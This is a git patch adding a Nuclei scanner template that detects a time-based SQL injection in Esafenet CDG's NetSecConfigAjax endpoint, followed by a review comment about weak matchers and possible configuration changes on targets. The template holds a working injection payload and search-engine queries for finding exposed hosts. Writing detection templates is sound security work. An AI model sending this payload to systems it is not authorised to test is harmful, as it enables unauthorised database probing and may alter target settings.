From 548c10c72094bedb56ef17e7bda533c3f6a0da05 Mon Sep 17 00:00:00 2001
From: r00t <24542600+adeljck@users.noreply.github.com>
Date: Wed, 24 Jul 2024 13:44:57 +0800
Subject: [PATCH] add esafenet-NetSecConfigAjax-Sqli.yaml
---
 .../esafenet-NetSecConfigAjax-Sqli.yaml | 38 +++++++++++++++++++
 1 file changed, 38 insertions(+)
 create mode 100644 http/vulnerabilities/esafenet/esafenet-NetSecConfigAjax-Sqli.yaml
diff --git a/http/vulnerabilities/esafenet/esafenet-NetSecConfigAjax-Sqli.yaml b/http/vulnerabilities/esafenet/esafenet-NetSecConfigAjax-Sqli.yaml
new file mode 100644
index 0000000000..0cc869b83a
--- /dev/null
+++ b/http/vulnerabilities/esafenet/esafenet-NetSecConfigAjax-Sqli.yaml
@@ -0,0 +1,38 @@
+id: esafenet-NetSecConfigAjax-Sqli
+
+info:
+ name: Esafenet CDG NetSecConfigAjax - Sql Injection
+ author: adeljck
+ severity: high
+ description: |
+ CDGServer3 NetSecConfigAjax Interface Sql Injection.
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: title="电子文档安全管理系统",body="CDGServer3/"
+ hunter-query: web.title="电子文档安全管理系统",web.body="CDGServer3/"
+ product: electronic_document_security_management_system
+ vendor: esafenet
+ tags: esafenet,sqli
+
+http:
+ - raw:
+ - |
+ POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/105.0.1249.139 Safari/537.36
+
+ command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--
+ max-size: 1000
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "操作成功"
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
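Review bot: The matchers never check the property the payload depends on: the request uses a `WAITFOR DELAY '0:0:5'` time-based probe, but the template only matches on the body word "操作成功" and status 200, which a non-vulnerable host that simply accepts the `updateNetSec` command would presumably also return, so the template cannot separate vulnerable from patched targets and will report false positives. Add a third matcher under `matchers:` that pins the delay, `- type: dsl` / `dsl:` / `- 'duration>=5'`, keeping `matchers-condition: and` so all three must hold. Since the probe sends `command=updateNetSec` with an attacker-controlled `state` value, the request may modify the target's network-security configuration; if that is the case the `description` should say so, because scanners run detection templates against production systems. The `condition: and` on a single-entry `words` list is redundant and can be dropped, and the file is missing its trailing newline.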